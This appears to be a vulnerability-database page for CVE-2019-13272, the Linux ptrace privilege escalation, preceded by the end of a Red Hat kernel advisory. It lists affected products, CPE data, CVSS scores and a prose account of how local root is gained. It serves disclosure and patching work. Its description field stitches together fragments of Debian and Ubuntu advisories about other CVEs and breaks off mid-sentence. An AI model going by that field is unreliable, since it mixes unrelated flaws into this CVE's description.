  • RHEL-Alt-7.6 - System crashed after oom - During ICP deployment (BZ#1710304)

  • kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)

  • RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3 cores in quad and misses last core. (CORAL) (BZ#1717836)

  • RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN (BZ#1717906)

  • fragmented packets timing out (BZ#1729066)

  • Backport TCP follow-up for small buffers (BZ#1733617)

Enhancement(s):

  • RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading nest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1664110 - CVE-2019-5489 Kernel: page cache side channel attacks 1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() 1730895 - CVE-2019-13272 kernel: broken permission and object lifetime handling for PTRACE_TRACEME

  1. Package List:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source: kernel-alt-4.14.0-115.12.1.el7a.src.rpm

aarch64: kernel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm kernel-devel-4.14.0-115.12.1.el7a.aarch64.rpm kernel-headers-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-libs-4.14.0-115.12.1.el7a.aarch64.rpm perf-4.14.0-115.12.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm

noarch: kernel-abi-whitelists-4.14.0-115.12.1.el7a.noarch.rpm kernel-doc-4.14.0-115.12.1.el7a.noarch.rpm

ppc64le: kernel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-bootwrapper-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-devel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-headers-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-libs-4.14.0-115.12.1.el7a.ppc64le.rpm perf-4.14.0-115.12.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm

s390x: kernel-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.s390x.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-debuginfo-common-s390x-4.14.0-115.12.1.el7a.s390x.rpm kernel-devel-4.14.0-115.12.1.el7a.s390x.rpm kernel-headers-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm kernel-kdump-devel-4.14.0-115.12.1.el7a.s390x.rpm perf-4.14.0-115.12.1.el7a.s390x.rpm perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm python-perf-4.14.0-115.12.1.el7a.s390x.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):

aarch64: kernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm kernel-tools-libs-devel-4.14.0-115.12.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm

noarch: kernel-doc-4.14.0-115.12.1.el7a.noarch.rpm

ppc64le: kernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debug-devel-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm kernel-tools-libs-devel-4.14.0-115.12.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXYS+G9zjgjWX9erEAQgWLQ/9E1IoTs6bpakJ6GIPIMJUeYDCRpXLRrHt CAdDGt7wQ2l5PUY2R98fiCs266c8Vaiqll6PDbFRDwHEI4gSkYnemdC3pdD/u1ct KEch6TBhUejC52t/Zvq2hrUItEj1oz35mVTv+cHHfX9HqVTdV+1SeOR+WoETy+I4 qdBKOSPybxtisp9fdczX0F3uzAfpHqCFVZ2OSvPJmDCZU20gjF+1h+HiyvS4iWT1 qrlMFQ1EliSMbjO/pCTj6PHIcOUNPg7tkx72s5E0qRd4Ja10nZ7QNUh8VGGHNQxb UYLfM7GojPgWx2UzjLo6EU5a9/Xuo6rwgTE5hKWGqZCm645RSv71tpTbdZJe6vnS cyzGIV7NtIvMF625LvimVBB/BSXZK3vYpSuBtcPnvKg2wAet83fIzQ4PtwBpzP7p NfFLvedXg2CRZIYbi5u6tzCqE2UKDpfvKWry8MyELDpt4b4iZEbHt0S4ZdfKzOvu ajvY2VuM414x0FZpWCEHFXT7dbcilf2ZBg0g0UgazRhumm9utfBsbmQz0fS7GcML Ef3YRj97YJPhGoeAQ8b+ox8Z+Q/J+/39smr94scd9FjhotlQgVh9zmd6c4IzisEE iwtg6J38bOHzXi9q3x3Fw4FTe6kUQHeOw9703w/EqojumKVCVCX6VoZ0tmAt720O ItDqWovzGmk=yv43 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201907-1641",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.1.17"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.58"
      },
      {
        "model": "e-series performance analyzer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "aff a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.71"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.133"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.52"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.39"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.185"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.40"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.185"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8.16"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.133",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.1.17",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.58",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.71",
                "versionStartIncluding": "3.16.52",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.185",
                "versionStartIncluding": "4.9.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.2",
                "versionStartIncluding": "4.1.39",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.185",
                "versionStartIncluding": "4.4.40",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9",
                "versionStartIncluding": "4.8.16",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_performance_analyzer:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.60.3",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Google Security Research, Ventsislav Varbanovski,Metasploit,nu11secur1ty,Jann Horn,bcoles",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-13272",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2019-13272",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-13272",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-13272",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201907-809",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-13272",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit\u0027s pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments. Linux Kernel Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use this\nto expose sensitive information. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nFor the oldstable distribution (stretch), this problem has been fixed\nin version 4.9.168-1+deb9u4. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 4.19.37-5+deb10u1. This update includes as well a patch for a\nregression introduced by the original fix for CVE-2019-11478 (#930904). \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0zJkBfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0SvYw/8CJrPtf7juWLaRa3m/LvFewU+BppoJqNaVUbQNXVT90PgH/zDWVbpkJ4g\nTr4MW6tzRKnAfUS+jObsnR9jGo871ZZ2wtlcM3W0bMnCwK6tPnTGiqTauflPXf2X\nKW8V3YLI6W6MxPlSLa2EQkDJ/RfTke4SwQDFDX0lzYjC5LwCwDwKIWBC6P5xBg6w\nyxNh6PHv9++ES8SKYpU3oMlWG43fJZJ8Oyy7Wdk0H84Qcjxb8FDP2iWyRf0Mvb+5\n1uFosUswfN89imMrIFdYhv/z7CYFeHgYA0lPIvQ1gpNWOflrGqoMYL1Pys95mVCV\nRdRBtWy2atPHos6HEgw85cxaTS9Ss9FYB0sL+QCqIdw5ZwTt5+QR+JLNvJ53VKEm\nBxE5TncjlEAOc9t74xti/vBW2eCjp7IPaMP8X8eqWKiaMGJBlwaJEPUSmL4SiZo+\ncW1plAYxc0CYq4lDWo3fcR7tBMQfp1ffDYUNn3DXvHChF1Ebi3zIdGl+oSeNP8hW\nOuaH6/P+qko0S/TNXAK5uaekrzjYv2pWm6xoM10fMVXiT8GiyjIGmSTTu6WvaiCA\nITdy+o/jAfBiQsdFer2MYUna8QxjOy3XClKsy9+yjrj8ciekC4nOPHdz3/CYfOha\ncojPRl2Qd2KSWfEUoze2IqPrr3iAnKFKH6a+WU1XQZuo6r3uo0Q=\n=fTIm\n-----END PGP SIGNATURE-----\n. 8) - x86_64\n\n3. =========================================================================\nUbuntu Security Notice USN-4117-1\nSeptember 02, 2019\n\nlinux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n\nDetails:\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated 